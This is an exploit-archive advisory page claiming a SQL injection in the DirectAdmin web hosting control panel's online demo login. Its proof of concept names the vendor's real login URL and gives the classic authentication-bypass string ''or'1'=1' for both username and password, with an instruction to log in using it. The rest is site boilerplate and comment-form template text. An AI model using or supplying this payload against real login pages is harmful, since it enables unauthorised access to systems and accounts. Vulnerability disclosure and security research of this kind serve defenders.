DirectAdmin On-Line Demo SQLInjection

2018.10.09

Juan Carlos Garcia (ES)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

++++++++++++++++++++++++++++++++++++++
# Exploit Title :DirectAdmin On-Line Demo SQLInjection
# *Vendor*:http://www.directadmin.com/
# Author: Juan Carlos Garca                                                                                                       
# Blog: http://hackingmadrid.blogspot.com
# Facebook https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl


DESCRIPTION
+++++++++++
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.

PoC
++++

https://www.directadmin.com:2222/CMD_LOGIN

user:user_demo
pass:demo

OR

user1:  'or'1'=1
pass1:  'or'1'=1


Procedure:Login using user1/pass1

++++++++++++++++++++++++
Tiger Team Security Nightsec
++++++++++++++++++++++++

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DirectAdmin On-Line Demo SQLInjection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.